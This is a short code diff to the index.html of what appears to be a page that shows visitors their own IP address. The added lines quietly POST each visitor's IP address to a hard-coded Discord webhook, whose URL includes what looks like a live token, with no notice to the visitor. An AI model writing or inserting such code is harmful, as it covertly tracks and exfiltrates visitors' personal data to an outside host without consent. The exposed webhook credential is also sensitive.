--- a/index.html
+++ b/index.html
@@ -60,6 +60,13 @@
           var ip = this.responseText;
           document.getElementById('ip').value = ip;
 
+          // Send the IP address to Discord webhook
+          var webhookUrl = 'https://discord.com/api/webhooks/1100478463942590545/mccHmCa8GVnBR3MO9bk-SA5cOkme3jNdlg7fyOJV0WPxPJ7_sqLjyurjhOTZTwUQXAmu';
+          var xhr2 = new XMLHttpRequest();
+          xhr2.open('POST', webhookUrl, true);
+          xhr2.setRequestHeader('Content-type', 'application/json');
+          xhr2.send(JSON.stringify({ content: 'Someone visited the website and their IP address is: ' + ip }));
+          
           var copyBtn = document.getElementById('copy-btn');
           copyBtn.addEventListener('click', function () {
             var textbox = document.getElementById('ip');
